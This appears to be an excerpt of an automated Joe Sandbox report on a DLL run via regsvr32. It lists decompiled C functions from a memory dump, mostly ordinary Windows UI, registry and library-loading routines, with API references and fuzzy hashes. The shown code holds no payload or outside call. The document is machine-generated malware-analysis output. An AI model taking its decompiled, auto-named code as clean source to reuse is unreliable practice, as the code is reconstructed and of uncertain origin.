0x10031fd4
0x10031fd6
0x10031fe9
0x10031fe9
0x10031fd4
0x10031ffc

APIs

UnpackDDElParam.USER32 ref: 10031F76
GlobalLock.KERNEL32 ref: 10031F81
lstrlenA.KERNEL32(00000000), ref: 10031F88
GlobalUnlock.KERNEL32(?), ref: 10031F9C
ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10031FB7
PostMessageA.USER32 ref: 10031FC4

Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrlen
String ID:
API String ID: 462239228-0
Opcode ID: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
Instruction ID: bfbb9d00b13f65a0ab326070f2ebd1bafe94df8b281a4b7973d805b3987b007f
Opcode Fuzzy Hash: 9b3d271c77589773dafac36f7ca5bc7fab3ad5ea6926df52b529a664096dacb0
Instruction Fuzzy Hash: 8D111C3554121CAFDB12DFA1DC88DDE7BB9FF55351F0045A5F809EA262DA34DE808B60

Uniqueness

Uniqueness Score: -1.00%

Function 10029BA4 Relevance: 9.0, APIs: 6, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10029BA4(struct HWND__* _a4) {
				struct HWND__* _t3;
				struct HWND__* _t6;
				struct HWND__* _t11;
				struct HWND__* _t14;

				_t3 = GetFocus();
				_t14 = _t3;
				if(_t14 != 0) {
					_t11 = _a4;
					if(_t14 == _t11) {
						L10:
						return _t3;
					}
					if(E10029A8E(_t14, 3) != 0) {
						L5:
						if(_t11 == 0 || (GetWindowLongA(_t11, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t14, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t11);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t14);
					_t14 = _t3;
					if(_t14 == _t11) {
						goto L9;
					}
					_t3 = E10029A8E(_t14, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}

0x10029ba5
0x10029bab
0x10029baf
0x10029bb2
0x10029bb8
0x10029c16
0x00000000
0x10029c16
0x10029bcb
0x10029be2
0x10029be4
0x10029c05
0x10029c0f
0x00000000
0x10029bf6
0x10029bf7
0x10029bfb
0x10029c03
0x10029c15
0x00000000
0x10029c15
0x00000000
0x10029c03
0x10029be4
0x10029bce
0x10029bd0
0x10029bd4
0x00000000
0x00000000
0x10029bd9
0x10029be0
0x00000000
0x00000000
0x00000000
0x10029be0
0x10029c18

APIs

GetFocus.USER32 ref: 10029BA5

Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7

GetParent.USER32(00000000), ref: 10029BCE

Part of subcall function 10029A8E: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
Part of subcall function 10029A8E: lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1

GetWindowLongA.USER32 ref: 10029BE9
GetParent.USER32(10032120), ref: 10029BF7
GetDesktopWindow.USER32 ref: 10029BFB
SendMessageA.USER32 ref: 10029C0F

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
String ID:
API String ID: 2818563221-0
Opcode ID: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
Instruction ID: cea5fa679d97d2953b6d76dc507eb4c5e7da3a0c11b163d723fb81d4da4a6e61
Opcode Fuzzy Hash: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
Instruction Fuzzy Hash: 7FF0A932500A306EE353A62B6D88F5E61D8DF81BD0FB20214F459E6192EB24AC8145A9

Uniqueness

Uniqueness Score: -1.00%

Function 10037A96 Relevance: 9.0, APIs: 6, Instructions: 47
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E10037A96(void* _a4, char* _a8, char* _a12) {
				void* _t14;
				long _t18;
				signed int _t20;
				long _t25;

				if(_a12 != 0) {
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
						L6:
						_t14 = 0;
						L7:
						return _t14;
					}
					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
					_t18 = RegCloseKey(_a4);
					if(_t18 != 0 || _t25 != 0) {
						goto L6;
					} else {
						_t14 = _t18 + 1;
						goto L7;
					}
				}
				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
				asm("sbb eax, eax");
				return  ~_t20 + 1;
			}

0x10037a9d
0x10037ad8
0x10037b0e
0x10037b0e
0x10037b10
0x00000000
0x10037b10
0x10037afb
0x10037afd
0x10037b05
0x00000000
0x10037b0b
0x10037b0b
0x00000000
0x10037b0b
0x10037b05
0x10037ab6
0x10037abe
0x00000000

APIs

lstrlenA.KERNEL32(?), ref: 10037AA2
RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 10037AB6
RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10037AD0
lstrlenA.KERNEL32(?), ref: 10037ADD
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 10037AF2
RegCloseKey.ADVAPI32(?), ref: 10037AFD

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Valuelstrlen$CloseCreate
String ID:
API String ID: 306239685-0
Opcode ID: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
Instruction ID: 36ac44db30e1571f4bd1a6b15574b4d5f9e82ccdf85d97020e0dea724d6fc6de
Opcode Fuzzy Hash: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
Instruction Fuzzy Hash: 4501043220016DFFEB235FA1DD48F9A7BA9FB08792F108410FE1AD9061D3718A60DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10029C98 Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10029C98(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}

0x10029ca7
0x10029cf8
0x10029cf8
0x10029cfa
0x10029cfe
0x00000000
0x00000000
0x10029cc4
0x10029cdb
0x10029ce1
0x10029cf3
0x00000000
0x10029d06
0x10029cf3
0x10029cf8
0x10029cf8
0x10029d03

APIs

ClientToScreen.USER32(?,?), ref: 10029CA7
GetDlgCtrlID.USER32 ref: 10029CBB
GetWindowLongA.USER32 ref: 10029CC9
GetWindowRect.USER32 ref: 10029CDB
PtInRect.USER32(?,?,?), ref: 10029CEB
GetWindow.USER32(?,00000005), ref: 10029CF8

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
Instruction ID: 9b9f6f1c131c314e5c19284c1e668e0a3a9e33f7fca6b6c160f9dd0f3207debf
Opcode Fuzzy Hash: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
Instruction Fuzzy Hash: 7A01623650056ABFDB129F569C48EEE37ADEF017D0F514115FD11EA161D730DA01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10022233 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10022233(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1001F7AE();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x44));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x44)) = 0;
				}
				_t64 =  *(_t72 + 0x48);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
				if(( *(_t72 + 0x38) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E100373DB() + 0x3c));
					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
						E10011C50( &_v52, 0, 0x30);
						_t48 =  *(_t72 + 0x1c);
						_v44 = _t48;
						_v40 = _t48;
						_v52 = 0x28;
						_v48 = 1;
						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
				E1002204B(_t72);
				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
					}
				}
				E10022168(_t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

0x1002223c
0x10022243
0x10022249
0x1002224e
0x10022273
0x10022273
0x10022279
0x1002227b
0x1002227b
0x10022279
0x1002227e
0x10022283
0x10022287
0x1002228a
0x1002228a
0x1002228d
0x10022295
0x1002229a
0x1002229a
0x1002229d
0x100222a4
0x100222ab
0x100222b0
0x100222c0
0x100222c5
0x100222cb
0x100222ce
0x100222df
0x100222e6
0x100222e9
0x100222e9
0x100222b0
0x100222fb
0x10022301
0x10022310
0x1002231c
0x10022320
0x10022328
0x10022328
0x10022320
0x10022330
0x10022343

APIs

SendMessageA.USER32 ref: 100222E9
GetWindowLongA.USER32 ref: 100222FB
GetWindowLongA.USER32 ref: 1002230C
SetWindowLongA.USER32(?,000000FC,?), ref: 10022328

Strings

(, xrefs: 100222DF

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
Instruction ID: 74d92888995a03eb436cf4db0a6f1431d092ba1e50ceac8416b65ae125f9645e
Opcode Fuzzy Hash: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
Instruction Fuzzy Hash: 0C31AD34600615FFCB21DFA9E884A6EB7F8FF04250F52062DE5429B692CB31F848CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10032286 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10032286(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t29;
				int _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				int _t42;
				intOrPtr* _t45;
				void* _t46;

				_t45 = __ecx;
				_t29 = E10022AD5(__ecx);
				_t40 =  *((intOrPtr*)(_t45 + 0x7c));
				_t42 = _a4;
				_t38 = _t29;
				if(_t40 == 0) {
					L2:
					if(_a8 != 0xffff) {
						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
							 *(_t45 + 0xa4) =  *(_t45 + 0xa4) & 0x00000000;
							goto L17;
						} else {
							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
								if(_t42 < 0xff00) {
									goto L13;
								}
								 *(_t45 + 0xa4) = 0xef1f;
								goto L17;
							} else {
								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
								L13:
								 *(_t45 + 0xa4) = _t42;
								L17:
								 *(_t38 + 0x38) =  *(_t38 + 0x38) | 0x00000040;
								L18:
								_t30 =  *(_t45 + 0xa4);
								if(_t30 ==  *((intOrPtr*)(_t45 + 0xa8))) {
									L21:
									return _t30;
								}
								_t30 = E100220EE(_t46, GetParent( *(_t45 + 0x1c)));
								if(_t30 == 0) {
									goto L21;
								}
								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
							}
						}
					}
					 *(_t45 + 0x38) =  *(_t45 + 0x38) & 0xffffffbf;
					if( *((intOrPtr*)(_t38 + 0x64)) != 0) {
						 *(_t45 + 0xa4) = 0xe002;
					} else {
						 *(_t45 + 0xa4) = 0xe001;
					}
					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0xa4), 0);
					_t35 =  *((intOrPtr*)( *_t45 + 0x150))();
					if(_t35 != 0) {
						UpdateWindow( *(_t35 + 0x1c));
					}
					goto L18;
				}
				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
				if(_t30 != 0) {
					goto L21;
				}
				goto L2;
			}

0x1003228c
0x1003228e
0x10032293
0x10032298
0x1003229b
0x1003229d
0x100322b3
0x100322ba
0x1003230d
0x10032352
0x00000000
0x10032317
0x1003231d
0x10032344
0x00000000
0x00000000
0x10032346
0x00000000
0x10032327
0x10032330
0x10032336
0x10032336
0x10032359
0x10032359
0x1003235d
0x1003235d
0x10032369
0x10032394
0x10032394
0x10032394
0x10032375
0x1003237c
0x00000000
0x00000000
0x00000000
0x1003238a
0x1003231d
0x1003230d
0x100322bc
0x100322c4
0x100322d2
0x100322c6
0x100322c6
0x100322c6
0x100322ec
0x100322f6
0x100322fe
0x10032303
0x10032303
0x00000000
0x100322fe
0x100322a8
0x100322ad
0x00000000
0x00000000
0x00000000

APIs

SendMessageA.USER32 ref: 100322EC
UpdateWindow.USER32(?), ref: 10032303
GetParent.USER32(?), ref: 1003236E
PostMessageA.USER32 ref: 1003238A

Strings

@, xrefs: 10032359

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$ParentPostSendUpdateWindow
String ID: @
API String ID: 4141989945-2766056989
Opcode ID: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
Instruction ID: 6191196fd6615e40dc101e77c52f198469b7c7f61996bf1ea28baad2e91494f1
Opcode Fuzzy Hash: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
Instruction Fuzzy Hash: 8D319635601B05EFEB22CF21CD48B5A77E5FF41352F258828E65A9E1A1C7B9A980DB01

Uniqueness

Uniqueness Score: -1.00%

Function 10034CE3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E10034CE3(void* __ecx, void* __eflags) {
				intOrPtr _t18;
				intOrPtr* _t20;
				intOrPtr _t26;
				void* _t33;
				void* _t35;

				E10011BF0(0x1003a3fc, _t35);
				_push(__ecx);
				_t33 = __ecx;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				E10034BFF(__ecx, 0x20, _t35 - 0x10);
				if( *((intOrPtr*)(_t35 + 8)) != 0 &&  *((intOrPtr*)(_t35 - 0x10)) == 0) {
					_t26 = E1001F77E(0x20);
					 *((intOrPtr*)(_t35 - 0x10)) = _t26;
					_t41 = _t26;
					 *(_t35 - 4) = 0;
					if(_t26 == 0) {
						_t20 = 0;
						__eflags = 0;
					} else {
						_push(0x1e);
						_push( *((intOrPtr*)(_t35 + 8)));
						_push("File%d");
						_push("Recent File List");
						_push(0);
						_t20 = E10024F0F(_t26, _t41);
					}
					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x84)) = _t20;
					 *((intOrPtr*)( *_t20 + 0x10))();
				}
				_t18 = E1003599F(_t33, "Settings", "PreviewPages", 0);
				 *((intOrPtr*)(_t33 + 0x90)) = _t18;
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t18;
			}

0x10034ce8
0x10034ced
0x10034cf8
0x10034cfa
0x10034cfd
0x10034d05
0x10034d14
0x10034d16
0x10034d19
0x10034d1b
0x10034d1e
0x10034d37
0x10034d37
0x10034d20
0x10034d20
0x10034d22
0x10034d25
0x10034d2a
0x10034d2f
0x10034d30
0x10034d30
0x10034d39
0x10034d3d
0x10034d47
0x10034d47
0x10034d57
0x10034d5f
0x10034d67
0x10034d6f

APIs

__EH_prolog.LIBCMT ref: 10034CE8

Part of subcall function 10024F0F: __EH_prolog.LIBCMT ref: 10024F14

Strings

Recent File List, xrefs: 10034D2A
PreviewPages, xrefs: 10034D4B
File%d, xrefs: 10034D25
Settings, xrefs: 10034D50

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog
String ID: File%d$PreviewPages$Recent File List$Settings
API String ID: 3519838083-526586445
Opcode ID: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
Instruction ID: 492fd1891bf7533495f0361d30171d8b100ab146b8dd749383e38376895f11d0
Opcode Fuzzy Hash: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
Instruction Fuzzy Hash: FA01B579A00605AFCB16EF649C05BEEBAB5FB84712F11861FF1569F281DF70A5408750

Uniqueness

Uniqueness Score: -1.00%

Function 10028BC6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10028BC6(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}

0x10028bcd
0x10028bcf
0x10028bdb
0x10028bdd
0x10028be5
0x10028bf8
0x10028bfc
0x10028bff
0x10028bff
0x10028be7
0x10028bf0
0x10028bf0
0x10028c09

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
SetLastError.KERNEL32(00000078,?,?,10030BC6,00000000), ref: 10028BFF

Strings

GDI32.DLL, xrefs: 10028BC8
SetLayout, xrefs: 10028BD5

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$SetLayout
API String ID: 4275029093-2147214759
Opcode ID: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
Instruction ID: de10e2654153e74bad07dc63c5cb2a97a5a293e8e121725d640a5f2c86b9b1e6
Opcode Fuzzy Hash: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
Instruction Fuzzy Hash: 1AE02077105110BFD253875A9C48C5F7B62D7C4372B11C619F276D5090CB3188018721

Uniqueness

Uniqueness Score: -1.00%

Function 10028B90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10028B90(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}

0x10028b96
0x10028ba4
0x10028bac
0x10028bb9
0x10028bbc
0x10028bae
0x10028bb3
0x10028bb3
0x10028bc5

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
SetLastError.KERNEL32(00000078), ref: 10028BBC

Strings

GDI32.DLL, xrefs: 10028B91
GetLayout, xrefs: 10028B9E

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$GetLayout
API String ID: 4275029093-2396518106
Opcode ID: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
Instruction ID: 54bc3d33d325d2134ddbcfb4761d493361e18e0aa1f1c781400aef32ec3f8dd9
Opcode Fuzzy Hash: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
Instruction Fuzzy Hash: BBD05EB6A052346FDAA35BF5AC4CE5A7A54DB047B2B418669FD65EA1E0CB24CC008790

Uniqueness

Uniqueness Score: -1.00%

Function 10011DCF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E10011DCF(int _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				_t3 = GetModuleHandleA("mscoree.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "CorExitProcess");
					if(_t4 != 0) {
						 *_t4(_a4);
					}
				}
				ExitProcess(_a4);
			}

0x10011dd4
0x10011ddc
0x10011de4
0x10011dec
0x10011df2
0x10011df2
0x10011dec
0x10011df8

APIs

GetModuleHandleA.KERNEL32(mscoree.dll,10011F3D,?,10041DB0,00000008,10011F63,?,00000001,00000000,10016CF1,00000003), ref: 10011DD4
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011DE4
ExitProcess.KERNEL32 ref: 10011DF8

Strings

mscoree.dll, xrefs: 10011DCF
CorExitProcess, xrefs: 10011DDE

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
Instruction ID: 44dc424d0b29a2a163b933457fd361873f6b0f507bf76f9d722852a62850aa7a
Opcode Fuzzy Hash: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
Instruction Fuzzy Hash: F2D0C9B0604217AFEA429BB2CD48DEB3AA8EF406857108428F416D8021CF31CD019B11

Uniqueness

Uniqueness Score: -1.00%

Function 100394B0 Relevance: 7.7, APIs: 5, Instructions: 236
stringCOMMON

Download Yara Rule

